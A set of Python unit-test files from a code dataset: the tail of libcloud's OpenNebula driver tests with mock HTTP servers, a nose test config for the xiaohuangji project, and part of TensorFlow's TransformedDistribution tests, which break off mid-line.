Setup test environment. """ OpenNebulaNodeDriver.connectionCls.conn_classes = ( OpenNebula_3_2_MockHttp, OpenNebula_3_2_MockHttp) self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.2',)) def test_reboot_node(self): """ Test reboot_node functionality. """ image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver) node = Node(5, None, None, None, None, self.driver, image=image) ret = self.driver.reboot_node(node) self.assertTrue(ret) def test_list_sizes(self): """ Test ex_list_networks functionality. """ sizes = self.driver.list_sizes() self.assertEqual(len(sizes), 3) size = sizes[0] self.assertEqual(size.id, '1') self.assertEqual(size.name, 'small') self.assertEqual(size.ram, 1024) self.assertTrue(size.cpu is None or isinstance(size.cpu, float)) self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int)) self.assertEqual(size.cpu, 1) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[1] self.assertEqual(size.id, '2') self.assertEqual(size.name, 'medium') self.assertEqual(size.ram, 4096) self.assertTrue(size.cpu is None or isinstance(size.cpu, float)) self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int)) self.assertEqual(size.cpu, 4) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[2] self.assertEqual(size.id, '3') self.assertEqual(size.name, 'large') self.assertEqual(size.ram, 8192) self.assertTrue(size.cpu is None or isinstance(size.cpu, float)) self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int)) self.assertEqual(size.cpu, 8) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) class OpenNebula_3_6_Tests(unittest.TestCase, OpenNebulaCaseMixin): """ OpenNebula.org test suite for OpenNebula v3.6. """ def setUp(self): """ Setup test environment. """ OpenNebulaNodeDriver.connectionCls.conn_classes = ( OpenNebula_3_6_MockHttp, OpenNebula_3_6_MockHttp) self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.6',)) def test_create_volume(self): new_volume = self.driver.create_volume(1000, 'test-volume') self.assertEqual(new_volume.id, '5') self.assertEqual(new_volume.size, 1000) self.assertEqual(new_volume.name, 'test-volume') def test_destroy_volume(self): images = self.driver.list_images() self.assertEqual(len(images), 2) image = images[0] ret = self.driver.destroy_volume(image) self.assertTrue(ret) def test_attach_volume(self): nodes = self.driver.list_nodes() node = nodes[0] images = self.driver.list_images() image = images[0] ret = self.driver.attach_volume(node, image, 'sda') self.assertTrue(ret) def test_detach_volume(self): images = self.driver.list_images() image = images[1] ret = self.driver.detach_volume(image) self.assertTrue(ret) nodes = self.driver.list_nodes() # node with only a single associated image node = nodes[1] ret = self.driver.detach_volume(node.image) self.assertFalse(ret) def test_list_volumes(self): volumes = self.driver.list_volumes() self.assertEqual(len(volumes), 2) volume = volumes[0] self.assertEqual(volume.id, '5') self.assertEqual(volume.size, 2048) self.assertEqual(volume.name, 'Ubuntu 9.04 LAMP') volume = volumes[1] self.assertEqual(volume.id, '15') self.assertEqual(volume.size, 1024) self.assertEqual(volume.name, 'Debian Sid') class OpenNebula_3_8_Tests(unittest.TestCase, OpenNebulaCaseMixin): """ OpenNebula.org test suite for OpenNebula v3.8. """ def setUp(self): """ Setup test environment. """ OpenNebulaNodeDriver.connectionCls.conn_classes = ( OpenNebula_3_8_MockHttp, OpenNebula_3_8_MockHttp) self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.8',)) def test_list_sizes(self): """ Test ex_list_networks functionality. """ sizes = self.driver.list_sizes() self.assertEqual(len(sizes), 3) size = sizes[0] self.assertEqual(size.id, '1') self.assertEqual(size.name, 'small') self.assertEqual(size.ram, 1024) self.assertEqual(size.cpu, 1) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[1] self.assertEqual(size.id, '2') self.assertEqual(size.name, 'medium') self.assertEqual(size.ram, 4096) self.assertEqual(size.cpu, 4) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[2] self.assertEqual(size.id, '3') self.assertEqual(size.name, 'large') self.assertEqual(size.ram, 8192) self.assertEqual(size.cpu, 8) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) class OpenNebula_1_4_MockHttp(MockHttp): """ Mock HTTP server for testing v1.4 of the OpenNebula.org compute driver. """ fixtures = ComputeFileFixtures('opennebula_1_4') def _compute(self, method, url, body, headers): """ Compute pool resources. """ if method == 'GET': body = self.fixtures.load('computes.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('compute_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _storage(self, method, url, body, headers): """ Storage pool resources. """ if method == 'GET': body = self.fixtures.load('storage.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('disk_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _network(self, method, url, body, headers): """ Network pool resources. """ if method == 'GET': body = self.fixtures.load('networks.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('network_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _compute_5(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _compute_15(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _compute_25(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_25.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _storage_5(self, method, url, body, headers): """ Storage entry resource. """ if method == 'GET': body = self.fixtures.load('disk_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _storage_15(self, method, url, body, headers): """ Storage entry resource. """ if method == 'GET': body = self.fixtures.load('disk_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _network_5(self, method, url, body, headers): """ Network entry resource. """ if method == 'GET': body = self.fixtures.load('network_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _network_15(self, method, url, body, headers): """ Network entry resource. """ if method == 'GET': body = self.fixtures.load('network_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.OK, body, {}, httplib.responses[httplib.OK]) class OpenNebula_2_0_MockHttp(MockHttp): """ Mock HTTP server for testing v2.0 through v3.2 of the OpenNebula.org compute driver. """ fixtures = ComputeFileFixtures('opennebula_2_0') def _compute(self, method, url, body, headers): """ Compute pool resources. """ if method == 'GET': body = self.fixtures.load('compute_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('compute_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _storage(self, method, url, body, headers): """ Storage pool resources. """ if method == 'GET': body = self.fixtures.load('storage_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('storage_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _network(self, method, url, body, headers): """ Network pool resources. """ if method == 'GET': body = self.fixtures.load('network_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('network_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _compute_5(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _compute_15(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _compute_25(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_25.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _storage_5(self, method, url, body, headers): """ Storage entry resource. """ if method == 'GET': body = self.fixtures.load('storage_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _storage_15(self, method, url, body, headers): """ Storage entry resource. """ if method == 'GET': body = self.fixtures.load('storage_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _network_5(self, method, url, body, headers): """ Network entry resource. """ if method == 'GET': body = self.fixtures.load('network_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _network_15(self, method, url, body, headers): """ Network entry resource. """ if method == 'GET': body = self.fixtures.load('network_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) class OpenNebula_3_0_MockHttp(OpenNebula_2_0_MockHttp): """ Mock HTTP server for testing v3.0 of the OpenNebula.org compute driver. """ fixtures_3_0 = ComputeFileFixtures('opennebula_3_0') def _network(self, method, url, body, headers): """ Network pool resources. """ if method == 'GET': body = self.fixtures_3_0.load('network_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures.load('network_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _network_5(self, method, url, body, headers): """ Network entry resource. """ if method == 'GET': body = self.fixtures_3_0.load('network_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _network_15(self, method, url, body, headers): """ Network entry resource. """ if method == 'GET': body = self.fixtures_3_0.load('network_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) class OpenNebula_3_2_MockHttp(OpenNebula_3_0_MockHttp): """ Mock HTTP server for testing v3.2 of the OpenNebula.org compute driver. """ fixtures_3_2 = ComputeFileFixtures('opennebula_3_2') def _compute_5(self, method, url, body, headers): """ Compute entry resource. """ if method == 'GET': body = self.fixtures.load('compute_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _instance_type(self, method, url, body, headers): """ Instance type pool. """ if method == 'GET': body = self.fixtures_3_2.load('instance_type_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) class OpenNebula_3_6_MockHttp(OpenNebula_3_2_MockHttp): """ Mock HTTP server for testing v3.6 of the OpenNebula.org compute driver. """ fixtures_3_6 = ComputeFileFixtures('opennebula_3_6') def _storage(self, method, url, body, headers): if method == 'GET': body = self.fixtures.load('storage_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'POST': body = self.fixtures_3_6.load('storage_5.xml') return (httplib.CREATED, body, {}, httplib.responses[httplib.CREATED]) def _compute_5(self, method, url, body, headers): if method == 'GET': body = self.fixtures_3_6.load('compute_5.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _compute_5_action(self, method, url, body, headers): body = self.fixtures_3_6.load('compute_5.xml') if method == 'POST': return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'GET': return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _compute_15(self, method, url, body, headers): if method == 'GET': body = self.fixtures_3_6.load('compute_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if method == 'PUT': body = "" return (httplib.ACCEPTED, body, {}, httplib.responses[httplib.ACCEPTED]) if method == 'DELETE': body = "" return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT]) def _storage_10(self, method, url, body, headers): """ Storage entry resource. """ if method == 'GET': body = self.fixtures_3_6.load('disk_10.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _storage_15(self, method, url, body, headers): """ Storage entry resource. """ if method == 'GET': body = self.fixtures_3_6.load('disk_15.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) class OpenNebula_3_8_MockHttp(OpenNebula_3_2_MockHttp): """ Mock HTTP server for testing v3.8 of the OpenNebula.org compute driver. """ fixtures_3_8 = ComputeFileFixtures('opennebula_3_8') def _instance_type(self, method, url, body, headers): """ Instance type pool. """ if method == 'GET': body = self.fixtures_3_8.load('instance_type_collection.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _instance_type_small(self, method, url, body, headers): """ Small instance type. """ if method == 'GET': body = self.fixtures_3_8.load('instance_type_small.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _instance_type_medium(self, method, url, body, headers): """ Medium instance type pool. """ if method == 'GET': body = self.fixtures_3_8.load('instance_type_medium.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _instance_type_large(self, method, url, body, headers): """ Large instance type pool. """ if method == 'GET': body = self.fixtures_3_8.load('instance_type_large.xml') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) if __name__ == '__main__': sys.exit(unittest.main())
apache-2.0
wangjun/xiaohuangji
tests/test_config.py
7
2111
#-*-coding:utf-8-*- """ Copyright (c) 2012 wgx731 <[email protected]> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the 'Software'), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ """ Nose test config file config sys path for testing """ import os import glob import sys TEST_DIR = os.path.abspath(os.path.dirname(__file__)) MAIN_CODE_DIR = os.path.abspath(os.path.join(TEST_DIR, os.path.pardir)) PLUGINS_CODE_DIR = os.path.abspath(os.path.join(MAIN_CODE_DIR, "plugins")) # Result refers to result returned by plugin WRONG_KEY_WORD_ERROR = "Missing or wrong keyword should not have result." WRONG_RESULT_ERROR = "Correct keyword should have result." WRONG_RESULT_FORMAT_ERROR = "Result should have correct format." class TestBase(object): @classmethod def clean_up(klass, path, wildcard): os.chdir(path) for rm_file in glob.glob(wildcard): os.unlink(rm_file) @classmethod def setup_class(klass): sys.stderr.write("\nRunning %s\n" % klass) @classmethod def teardown_class(klass): klass.clean_up(TEST_DIR, "*.py?") klass.clean_up(PLUGINS_CODE_DIR, "*.py?") klass.clean_up(MAIN_CODE_DIR, "*.py?")
mit
ArtsiomCh/tensorflow
tensorflow/contrib/distributions/python/kernel_tests/transformed_distribution_test.py
8
16622
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for TransformedDistribution.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from scipy import stats from tensorflow.contrib import distributions from tensorflow.contrib import linalg from tensorflow.contrib.distributions.python.ops import bijectors from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import tensor_shape from tensorflow.python.ops import array_ops from tensorflow.python.ops import math_ops from tensorflow.python.platform import test bs = bijectors ds = distributions la = linalg class TransformedDistributionTest(test.TestCase): def _cls(self): return ds.TransformedDistribution def _make_unimplemented(self, name): def _unimplemented(self, *args): # pylint: disable=unused-argument raise NotImplementedError("{} not implemented".format(name)) return _unimplemented def testTransformedDistribution(self): g = ops.Graph() with g.as_default(): mu = 3.0 sigma = 2.0 # Note: the Jacobian callable only works for this example; more generally # you may or may not need a reduce_sum. log_normal = self._cls()( distribution=ds.Normal(loc=mu, scale=sigma), bijector=bs.Exp(event_ndims=0)) sp_dist = stats.lognorm(s=sigma, scale=np.exp(mu)) # sample sample = log_normal.sample(100000, seed=235) self.assertAllEqual([], log_normal.event_shape) with self.test_session(graph=g): self.assertAllEqual([], log_normal.event_shape_tensor().eval()) self.assertAllClose( sp_dist.mean(), np.mean(sample.eval()), atol=0.0, rtol=0.05) # pdf, log_pdf, cdf, etc... # The mean of the lognormal is around 148. test_vals = np.linspace(0.1, 1000., num=20).astype(np.float32) for func in [[log_normal.log_prob, sp_dist.logpdf], [log_normal.prob, sp_dist.pdf], [log_normal.log_cdf, sp_dist.logcdf], [log_normal.cdf, sp_dist.cdf], [log_normal.survival_function, sp_dist.sf], [log_normal.log_survival_function, sp_dist.logsf]]: actual = func[0](test_vals) expected = func[1](test_vals) with self.test_session(graph=g): self.assertAllClose(expected, actual.eval(), atol=0, rtol=0.01) def testNonInjectiveTransformedDistribution(self): g = ops.Graph() with g.as_default(): mu = 1. sigma = 2.0 abs_normal = self._cls()( distribution=ds.Normal(loc=mu, scale=sigma), bijector=bs.AbsoluteValue(event_ndims=0)) sp_normal = stats.norm(mu, sigma) # sample sample = abs_normal.sample(100000, seed=235) self.assertAllEqual([], abs_normal.event_shape) with self.test_session(graph=g): sample_ = sample.eval() self.assertAllEqual([], abs_normal.event_shape_tensor().eval()) # Abs > 0, duh! np.testing.assert_array_less(0, sample_) # Let X ~ Normal(mu, sigma), Y := |X|, then # P[Y < 0.77] = P[-0.77 < X < 0.77] self.assertAllClose( sp_normal.cdf(0.77) - sp_normal.cdf(-0.77), (sample_ < 0.77).mean(), rtol=0.01) # p_Y(y) = p_X(-y) + p_X(y), self.assertAllClose( sp_normal.pdf(1.13) + sp_normal.pdf(-1.13), abs_normal.prob(1.13).eval()) # Log[p_Y(y)] = Log[p_X(-y) + p_X(y)] self.assertAllClose( np.log(sp_normal.pdf(2.13) + sp_normal.pdf(-2.13)), abs_normal.log_prob(2.13).eval()) def testQuantile(self): with self.test_session() as sess: logit_normal = self._cls()( distribution=ds.Normal(loc=0., scale=1.), bijector=bs.Sigmoid(), validate_args=True) grid = [0., 0.25, 0.5, 0.75, 1.] q = logit_normal.quantile(grid) cdf = logit_normal.cdf(q) cdf_ = sess.run(cdf) self.assertAllClose(grid, cdf_, rtol=1e-6, atol=0.) def testCachedSamples(self): exp_forward_only = bs.Exp(event_ndims=0) exp_forward_only._inverse = self._make_unimplemented( "inverse") exp_forward_only._inverse_event_shape_tensor = self._make_unimplemented( "inverse_event_shape_tensor ") exp_forward_only._inverse_event_shape = self._make_unimplemented( "inverse_event_shape ") exp_forward_only._inverse_log_det_jacobian = self._make_unimplemented( "inverse_log_det_jacobian ") with self.test_session() as sess: mu = 3.0 sigma = 0.02 log_normal = self._cls()( distribution=ds.Normal(loc=mu, scale=sigma), bijector=exp_forward_only) sample = log_normal.sample([2, 3], seed=42) sample_val, log_pdf_val = sess.run([sample, log_normal.log_prob(sample)]) expected_log_pdf = stats.lognorm.logpdf( sample_val, s=sigma, scale=np.exp(mu)) self.assertAllClose(expected_log_pdf, log_pdf_val, rtol=1e-4, atol=0.) def testCachedSamplesInvert(self): exp_inverse_only = bs.Exp(event_ndims=0) exp_inverse_only._forward = self._make_unimplemented( "forward") exp_inverse_only._forward_event_shape_tensor = self._make_unimplemented( "forward_event_shape_tensor ") exp_inverse_only._forward_event_shape = self._make_unimplemented( "forward_event_shape ") exp_inverse_only._forward_log_det_jacobian = self._make_unimplemented( "forward_log_det_jacobian ") log_forward_only = bs.Invert(exp_inverse_only) with self.test_session() as sess: # The log bijector isn't defined over the whole real line, so we make # sigma sufficiently small so that the draws are positive. mu = 2. sigma = 1e-2 exp_normal = self._cls()( distribution=ds.Normal(loc=mu, scale=sigma), bijector=log_forward_only) sample = exp_normal.sample([2, 3], seed=42) sample_val, log_pdf_val = sess.run([sample, exp_normal.log_prob(sample)]) expected_log_pdf = sample_val + stats.norm.logpdf( np.exp(sample_val), loc=mu, scale=sigma) self.assertAllClose(expected_log_pdf, log_pdf_val, atol=0.) def testShapeChangingBijector(self): with self.test_session(): softmax = bs.SoftmaxCentered() standard_normal = ds.Normal(loc=0., scale=1.) multi_logit_normal = self._cls()( distribution=standard_normal, bijector=softmax) x = [[-np.log(3.), 0.], [np.log(3), np.log(5)]] y = softmax.forward(x).eval() expected_log_pdf = (stats.norm(loc=0., scale=1.).logpdf(x) - np.sum(np.log(y), axis=-1)) self.assertAllClose(expected_log_pdf, multi_logit_normal.log_prob(y).eval()) self.assertAllClose( [1, 2, 3, 2], array_ops.shape(multi_logit_normal.sample([1, 2, 3])).eval()) self.assertAllEqual([2], multi_logit_normal.event_shape) self.assertAllEqual([2], multi_logit_normal.event_shape_tensor().eval()) def testEntropy(self): with self.test_session(): shift = np.array([[-1, 0, 1], [-1, -2, -3]], dtype=np.float32) diag = np.array([[1, 2, 3], [2, 3, 2]], dtype=np.float32) actual_mvn_entropy = np.concatenate([ [stats.multivariate_normal(shift[i], np.diag(diag[i]**2)).entropy()] for i in range(len(diag))]) fake_mvn = self._cls()( ds.MultivariateNormalDiag( loc=array_ops.zeros_like(shift), scale_diag=array_ops.ones_like(diag), validate_args=True), bs.AffineLinearOperator( shift, scale=la.LinearOperatorDiag(diag, is_non_singular=True), validate_args=True), validate_args=True) self.assertAllClose(actual_mvn_entropy, fake_mvn.entropy().eval()) def testScalarBatchScalarEventIdentityScale(self): with self.test_session() as sess: exp2 = self._cls()( ds.Exponential(rate=0.25), bijector=ds.bijectors.Affine( scale_identity_multiplier=2., event_ndims=0)) log_prob = exp2.log_prob(1.) log_prob_ = sess.run(log_prob) base_log_prob = -0.5 * 0.25 + np.log(0.25) ildj = np.log(2.) self.assertAllClose(base_log_prob - ildj, log_prob_, rtol=1e-6, atol=0.) class ScalarToMultiTest(test.TestCase): def _cls(self): return ds.TransformedDistribution def setUp(self): self._shift = np.array([-1, 0, 1], dtype=np.float32) self._tril = np.array([[[1., 0, 0], [2, 1, 0], [3, 2, 1]], [[2, 0, 0], [3, 2, 0], [4, 3, 2]]], dtype=np.float32) def _testMVN(self, base_distribution_class, base_distribution_kwargs, batch_shape=(), event_shape=(), not_implemented_message=None): with self.test_session() as sess: # Overriding shapes must be compatible w/bijector; most bijectors are # batch_shape agnostic and only care about event_ndims. # In the case of `Affine`, if we got it wrong then it would fire an # exception due to incompatible dimensions. batch_shape_pl = array_ops.placeholder( dtypes.int32, name="dynamic_batch_shape") event_shape_pl = array_ops.placeholder( dtypes.int32, name="dynamic_event_shape") feed_dict = {batch_shape_pl: np.array(batch_shape, dtype=np.int32), event_shape_pl: np.array(event_shape, dtype=np.int32)} fake_mvn_dynamic = self._cls()( distribution=base_distribution_class(validate_args=True, **base_distribution_kwargs), bijector=bs.Affine(shift=self._shift, scale_tril=self._tril), batch_shape=batch_shape_pl, event_shape=event_shape_pl, validate_args=True) fake_mvn_static = self._cls()( distribution=base_distribution_class(validate_args=True, **base_distribution_kwargs), bijector=bs.Affine(shift=self._shift, scale_tril=self._tril), batch_shape=batch_shape, event_shape=event_shape, validate_args=True) actual_mean = np.tile(self._shift, [2, 1]) # Affine elided this tile. actual_cov = np.matmul(self._tril, np.transpose(self._tril, [0, 2, 1])) def actual_mvn_log_prob(x): return np.concatenate([ [stats.multivariate_normal( actual_mean[i], actual_cov[i]).logpdf(x[:, i, :])] for i in range(len(actual_cov))]).T actual_mvn_entropy = np.concatenate([ [stats.multivariate_normal( actual_mean[i], actual_cov[i]).entropy()] for i in range(len(actual_cov))]) self.assertAllEqual([3], fake_mvn_static.event_shape) self.assertAllEqual([2], fake_mvn_static.batch_shape) self.assertAllEqual(tensor_shape.TensorShape(None), fake_mvn_dynamic.event_shape) self.assertAllEqual(tensor_shape.TensorShape(None), fake_mvn_dynamic.batch_shape) x = fake_mvn_static.sample(5, seed=0).eval() for unsupported_fn in (fake_mvn_static.log_cdf, fake_mvn_static.cdf, fake_mvn_static.survival_function, fake_mvn_static.log_survival_function): with self.assertRaisesRegexp(NotImplementedError, not_implemented_message): unsupported_fn(x) num_samples = 5e3 for fake_mvn, feed_dict in ((fake_mvn_static, {}), (fake_mvn_dynamic, feed_dict)): # Ensure sample works by checking first, second moments. y = fake_mvn.sample(int(num_samples), seed=0) x = y[0:5, ...] sample_mean = math_ops.reduce_mean(y, 0) centered_y = array_ops.transpose(y - sample_mean, [1, 2, 0]) sample_cov = math_ops.matmul( centered_y, centered_y, transpose_b=True) / num_samples [ sample_mean_, sample_cov_, x_, fake_event_shape_, fake_batch_shape_, fake_log_prob_, fake_prob_, fake_entropy_, ] = sess.run([ sample_mean, sample_cov, x, fake_mvn.event_shape_tensor(), fake_mvn.batch_shape_tensor(), fake_mvn.log_prob(x), fake_mvn.prob(x), fake_mvn.entropy(), ], feed_dict=feed_dict) self.assertAllClose(actual_mean, sample_mean_, atol=0.1, rtol=0.1) self.assertAllClose(actual_cov, sample_cov_, atol=0., rtol=0.1) # Ensure all other functions work as intended. self.assertAllEqual([5, 2, 3], x_.shape) self.assertAllEqual([3], fake_event_shape_) self.assertAllEqual([2], fake_batch_shape_) self.assertAllClose(actual_mvn_log_prob(x_), fake_log_prob_, atol=0., rtol=1e-6) self.assertAllClose(np.exp(actual_mvn_log_prob(x_)), fake_prob_, atol=0., rtol=1e-5) self.assertAllClose(actual_mvn_entropy, fake_entropy_, atol=0., rtol=1e-6) def testScalarBatchScalarEvent(self): self._testMVN( base_distribution_class=ds.Normal, base_distribution_kwargs={"loc": 0., "scale": 1.}, batch_shape=[2], event_shape=[3], not_implemented_message="not implemented when overriding event_shape") def testScalarBatchNonScalarEvent(self): self._testMVN( base_distribution_class=ds.MultivariateNormalDiag, base_distribution_kwargs={"loc": [0., 0., 0.], "scale_diag": [1., 1, 1]}, batch_shape=[2], not_implemented_message="not implemented") with self.test_session(): # Can't override event_shape for scalar batch, non-scalar event. with self.assertRaisesRegexp(ValueError, "base distribution not scalar"): self._cls()( distribution=ds.MultivariateNormalDiag(loc=[0.], scale_diag=[1.]), bijector=bs.Affine(shift=self._shift, scale_tril=self._tril), batch_shape=[2], event_shape=[3], validate_args=True) def testNonScalarBatchScalarEvent(self): self._testMVN( base_distribution_class=ds.Normal, base_distribution_kwargs={"loc": [0., 0], "scale": [1., 1]}, event_shape=[3], not_implemented_message="not implemented when overriding event_shape") with self.test_session(): # Can't override batch_shape for non-scalar batch, scalar event. with self.assertRaisesRegexp(ValueError, "base distribution not scalar"): self._cls()( distribution=ds.Normal(loc=[0.], scale=[1.]), bijector=bs.Affine(shift=self._shift, scale_tril=self._tril), batch_shape=[2], event_shape=[3], validate_args=True) def testNonScalarBatchNonScalarEvent(self): with self.test_session(): # Can't override event_shape and/or batch_shape for non_scalar batch, # non-scalar event. with self.assertRaisesRegexp(ValueError, "base 